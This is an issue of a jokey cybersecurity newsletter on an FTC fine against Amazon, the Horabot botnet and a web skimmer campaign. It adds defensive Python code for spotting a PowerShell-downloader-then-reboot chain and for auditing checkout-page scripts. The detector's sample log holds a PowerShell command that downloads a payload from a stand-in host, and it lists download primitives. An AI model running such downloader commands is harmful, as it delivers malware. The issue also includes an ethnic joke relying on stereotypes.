Jun 05 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that does for cybersecurity what Mizzy’s done for the argument for censorship 🤦
Today’s hottest cyber security stories:
Amazon fined $30m for perving on 55k customers via Ring & Alexa
Horabot botnet sweeps Latin America
WooCommerce, Magento, WordPress, and Shopify hit by Web Skimmer
The U.S. Federal Trade Commission (FTC) has slapped Amazon with a whopping $30.8 million in fines! Apparently, Amazon had some serious privacy lapses when it comes to their Alexa assistant and those Ring security cameras.
Now, let's break it down. The FTC threw a $25 million penalty at Amazon for breaking the rules when it comes to kids' privacy.
It turns out they were keeping children's voice recordings captured by Alexa indefinitely. Parents couldn't even delete them!
The FTC's Samuel Levine had some strong words, saying Amazon was all about sacrificing privacy for profits. Ouch!
In addition to that hefty fine, Amazon has been ordered to clean up its act. They have to delete all that collected information, including the inactive child accounts, geolocation data, and those embarrassing voice recordings.
Oh, and they can't go snooping around and gathering that kind of data to train their clever algorithms anymore. Time to spill the beans on their data retention practices too! They’re putting Amazon in the sin bin, for sure. Serves them right!
And here comes the cherry on top: Amazon will be digging deep into their pockets to the tune of an extra $5.8 million in consumer refunds.
Why, you ask? Well, it seems like they played fast and loose with access to private videos recorded by those Ring cameras. Turns out, any employee or contractor could peek at those intimate spaces in people's homes. Can you believe it?
One employee had a field day watching thousands of videos belonging to female users in the bathroom and bedroom! It took another employee to finally catch them in the act. Gross.
So, yeah. Amazon got a major slap on the wrist from the FTC, and it's safe to say they won't be getting any gold stars for their privacy practices.
Let's hope they've learned their lesson and won't make us the stars of their creepy video voyeur show.
Stay vigilant, and keep those bathroom and bedroom cameras unplugged!
First things first: what do you call a Mexican who’s lost his car? Carlos! 😂 Sorry, don’t cancel us. Back to the story…
Hold on to your sombreros, folks! Spanish-speaking users in Latin America have found themselves in a bit of a pickle (jalapeño?) thanks to the infamous malware known as Horabot. It's like a villain straight out of a telenovela, causing chaos since November 2020!
According to our cyber-sleuth, Cisco Talos researcher Chetan Raghuprasad, Horabot gives the bad guys full control over the victim's Outlook mailbox.
Not only can they snoop around and steal email addresses from unsuspecting contacts, but they can also send phishing emails with sneaky HTML attachments to everyone in the victim's inbox, turning your inbox into a fiesta of malicious mayhem!
This mischievous botnet doesn't stop there. It also unleashes a financial trojan on Windows-based systems and even comes equipped with a spam tool.
The bad guys want to get their hands on those precious online banking credentials, and they won't hesitate to compromise Gmail, Outlook, and Yahoo! webmail accounts just to bombard the world with spam emails.
Apparently, this party-crashing malware has been having a fiesta primarily in Mexico.
Our amigos in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama have also had a taste of its unwanted attention. The sneaky mastermind behind this chaos is believed to be hiding somewhere in Brazil.
So, how does the chaos begin, you ask? Well, it all starts with phishing emails that lure victims with tax-themed tricks. They tempt you to open an HTML attachment, which is like opening Pandora's box of trouble.
Inside, you'll find a link that leads to a sneaky RAR archive. Open that, and voila! A PowerShell downloader script comes to life, retrieving a ZIP file with all the nasty payloads from a remote server.
And just to make things more interesting, your machine decides to take a siesta and restart itself. Isn't that thoughtful?
But wait, there's a twist! This reboot isn't just an ordinary restart. It's like the malware's way of saying, "Hold my tequila!" As your system wakes up, it becomes the launching pad for the banking trojan and spam tool.
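For the blue-teamers among you, here's an added example (our own, not Cisco Talos' code and not tied to any real Horabot sample) of how the "archive spawns PowerShell downloader, then the box reboots" sequence described above can be spotted in a process-creation log. The log lines, host names, user paths, the download host `example.invalid` and the archive tool names are all constructed; the detection pairs a PowerShell download command with a forced reboot on the same host inside a short window, so a reboot on its own never fires.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation log lines (not from the article, from
# Cisco Talos, or from any real incident). Host names, user paths and the
# download host "example.invalid" are made up. Lines 2 and 4 reproduce the
# chain the newsletter describes: an archive tool spawning a PowerShell
# downloader, followed shortly by a forced reboot on the same host.
SAMPLE_LOGS = [
    r'2023-06-01T09:58:02 host=WS-17 parent=outlook.exe image=msedge.exe cmd="msedge.exe C:\Users\ana\AppData\Local\Temp\factura.html"',
    r'2023-06-01T09:59:40 host=WS-17 parent=WinRAR.exe image=powershell.exe cmd="powershell.exe -Command Invoke-WebRequest http://example.invalid/p.zip -OutFile C:\Users\ana\AppData\Local\Temp\p.zip"',
    r'2023-06-01T10:00:05 host=WS-42 parent=explorer.exe image=powershell.exe cmd="powershell.exe -Command Get-ChildItem C:\Reports"',
    r'2023-06-01T10:01:12 host=WS-17 parent=powershell.exe image=shutdown.exe cmd="shutdown.exe /r /t 0"',
    r'2023-06-01T11:30:00 host=WS-42 parent=explorer.exe image=shutdown.exe cmd="shutdown.exe /r /t 0"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)

# PowerShell download primitives commonly seen in downloader one-liners.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|iwr\b|Invoke-RestMethod|DownloadFile|DownloadString"
    r"|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)

# Archive tools that, as the parent of PowerShell, match the "RAR archive ->
# PowerShell downloader" step. Names are assumed, not taken from the article.
ARCHIVE_PARENTS = {"winrar.exe", "7zfm.exe", "7z.exe"}


def parse_line(line):
    """Parse one log line into a dict; returns None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def is_powershell_downloader(ev):
    return ev["image"].lower() == "powershell.exe" and bool(DOWNLOAD_RE.search(ev["cmd"]))


def is_forced_reboot(ev):
    image = ev["image"].lower()
    cmd = ev["cmd"]
    if image == "shutdown.exe" and re.search(r"(^|\s)/r\b", cmd):
        return True
    return image == "powershell.exe" and "Restart-Computer" in cmd


def find_downloader_reboot_chains(lines, window=timedelta(minutes=10)):
    """Return one alert per PowerShell download that is followed within
    `window` by a forced reboot on the same host. A reboot alone is ignored."""
    events = [ev for ev in (parse_line(l) for l in lines) if ev]
    alerts = []
    for dl in filter(is_powershell_downloader, events):
        for rb in filter(is_forced_reboot, events):
            if rb["host"] == dl["host"] and dl["ts"] < rb["ts"] <= dl["ts"] + window:
                alerts.append({
                    "host": dl["host"],
                    "download_at": dl["ts"].isoformat(),
                    "reboot_at": rb["ts"].isoformat(),
                    # stronger signal when the downloader was launched by an archive tool
                    "from_archive": dl["parent"].lower() in ARCHIVE_PARENTS,
                })
                break  # one alert per downloader event is enough
    return alerts


if __name__ == "__main__":
    for alert in find_downloader_reboot_chains(SAMPLE_LOGS):
        print(alert)
```

Run it and the only alert is for WS-17, where WinRAR launched the downloader and the reboot came 92 seconds later; WS-42's lone `shutdown /r` and its harmless PowerShell directory listing stay quiet. Tune the window and the parent-process list to your own estate before wiring it into a SIEM rule.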
So, amigos, be on high alert! Horabot is out there, ready to crash your inbox and make a mess of things. Keep those antivirus tools handy, double-check those suspicious emails, and remember to never click on anything that looks fishier than a taco without guacamole.
Uh-oh, a group of cybersecurity researchers has discovered a fresh and active web skimmer campaign, reminiscent of the dreaded Magecart attacks, aimed at pilfering personally identifiable information (PII) and credit card details from e-commerce websites.
What sets this campaign apart from previous Magecart incidents is its utilisation of compromised websites as "makeshift" command-and-control (C2) servers.
This clever and dastardly tactic allows the attackers to distribute malicious code discreetly, without the knowledge of the victimised websites.
Akamai, a web security company, has reported identifying victims of various sizes across North America, Latin America, and Europe. As a result, the personal data of thousands of website visitors is now at risk of being harvested and traded for illicit profits.
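If you run a shop, the practical takeaway from this one is knowing exactly which scripts your checkout page loads and from where. Here's an added example (ours, not Akamai's tooling) that audits the script tags on a page against a short allowlist of vetted origins, flags cross-origin scripts without Subresource Integrity, and builds a matching Content-Security-Policy `script-src` directive. The sample HTML, the host names and the SRI digest are constructed; the third script tag stands in for a skimmer served from an unrelated compromised site of the kind described above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout-page HTML (not from any real site or from Akamai's
# report). The third script tag stands in for a skimmer loaded from an
# unrelated, compromised site acting as a makeshift distribution point.
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-payments.com/checkout.js"
        integrity="sha384-placeholderdigest" crossorigin="anonymous"></script>
<script src="https://blog.unrelated-shop.example/wp-content/uploads/jquery.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>checkout form</body></html>
"""

# Origins the shop owner has explicitly vetted for its checkout pages (assumed).
ALLOWED_SCRIPT_HOSTS = {"cdn.example-payments.com"}


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> tag on the page."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append(dict(attrs))


def collect_scripts(html):
    p = ScriptCollector()
    p.feed(html)
    return p.scripts


def audit_script_sources(html, allowed_hosts, page_host="shop.example"):
    """Return a list of (finding, src) tuples; an empty list means every
    external script comes from an allowed host and carries an integrity hash."""
    findings = []
    for attrs in collect_scripts(html):
        src = attrs.get("src")
        if src is None:
            continue  # inline scripts need a separate review (or a CSP nonce)
        host = urlparse(src).netloc.lower()
        if host == "" or host == page_host:
            continue  # same-origin script
        if host not in allowed_hosts:
            findings.append(("unexpected-origin", src))
        elif "integrity" not in attrs:
            findings.append(("missing-sri", src))
    return findings


def build_script_src_csp(allowed_hosts):
    """Build a Content-Security-Policy script-src directive that permits only
    same-origin scripts and the vetted hosts, so a script injected from a
    compromised third-party site is refused by the browser."""
    sources = " ".join(f"https://{h}" for h in sorted(allowed_hosts))
    return f"script-src 'self' {sources}".rstrip()


if __name__ == "__main__":
    for finding in audit_script_sources(SAMPLE_HTML, ALLOWED_SCRIPT_HOSTS):
        print(*finding)
    print(build_script_src_csp(ALLOWED_SCRIPT_HOSTS))
```

On the sample page the only finding is the jQuery copy pulled from the unrelated blog; the payment provider's script passes because it is both allowlisted and pinned with an integrity hash. Run the audit against a saved copy of your checkout page after every deploy, and ship the generated CSP header so the browser enforces the same list at runtime.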
Damn, sorry to start the week off on such a downer but hey, perhaps tomorrow will bring some good news. And honestly, Amazon getting fined $30m for snooping is sort of good news, right?
Stay safe, people!
So long and thanks for reading all the phish!